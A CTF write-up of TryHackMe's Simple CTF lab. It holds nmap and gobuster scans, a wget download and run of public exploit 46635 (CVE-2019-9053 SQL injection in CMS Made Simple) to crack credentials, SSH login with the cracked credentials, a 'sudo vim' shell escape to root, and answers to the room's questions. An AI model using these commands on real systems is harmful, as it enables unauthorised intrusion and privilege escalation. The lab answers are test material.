Buy me a tea

TryHackMe - SimpleCTF

Nmap

┌──(root💀kali)-[~]
└─# nmap -T5 -sC -sV -O -Pn -p- 10.10.61.2   
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-08 09:12 EDT
Nmap scan report for 10.10.61.2
Host is up (0.22s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.13.22.56
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 2 disallowed entries 
|_/ /openemr-5_0_1_3 
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 29:42:69:14:9e:ca:d9:17:98:8c:27:72:3a:cd:a9:23 (RSA)
|   256 9b:d1:65:07:51:08:00:61:98:de:95:ed:3a:e3:81:1c (ECDSA)
|_  256 12:65:1b:61:cf:4d:e5:75:fe:f4:e8:d4:6e:10:2a:f6 (ED25519)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.13 (90%), Crestron XPanel control system (90%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.16 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%), Adtran 424RG FTTH gateway (86%), Linux 2.6.32 (86%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 333.81 seconds

Gobuster

┌──(root💀kali)-[~]
└─# gobuster dir -u http://10.10.61.2/ --wildcard -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.61.2/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/05/08 09:30:20 Starting gobuster in directory enumeration mode
===============================================================
/simple               (Status: 301) [Size: 309] [--> http://10.10.61.2/simple/]

  • We find a page using CMS made simple that has a cve. We can try this exploit

  • We take it in our kali wget https://www.exploit-db.com/download/46635

  • python 46635 -u http://10.10.61.2/simple/ --crack -w /usr/share/seclists/Passwords/Common-Credentials/best110.txt image

  • Once the credentials found we can login here http://10.10.61.2/simple/admin/login.php image

  • But we can also try to check if the creds would work with ssh (Remember to specify the port in your ssh command because it is not on default 22 port)

  • ssh mitch@10.10.104.30 -p 2222

Privesc

  • sudo -l we find out that vim is allowed

  • We can do this trick here sudo vim -c ':!/bin/bash' I just changed it to get a bash shell

  • It works image

Questions

  • How many services are running under port 1000? Answer 2

  • What is running on the higher port? Answer ssh

  • What's the CVE you're using against the application? Answer CVE-2019-9053 reading the exploit we understand that the app is vulnerable to a time based SQL injection.

  • To what kind of vulnerability is the application vulnerable? Answer SQLi

  • What's the password? I will let you find this on your own

  • Where can you login with the details obtained? Answer ssh

  • What's the user flag? I will let you find this on your own. Hint: cat user.txt

  • Is there any other user in the home directory? What's its name? We do an ls /home and we find the user sunbath

  • What can you leverage to spawn a privileged shell? Answer vim

  • What's the root flag? I will let you find this on your own. Hint: cat /root/root.txt

PreviousTryHackMe - OWASP Top 10 2021NextTryHackMe - SQL Injection Lab

Last updated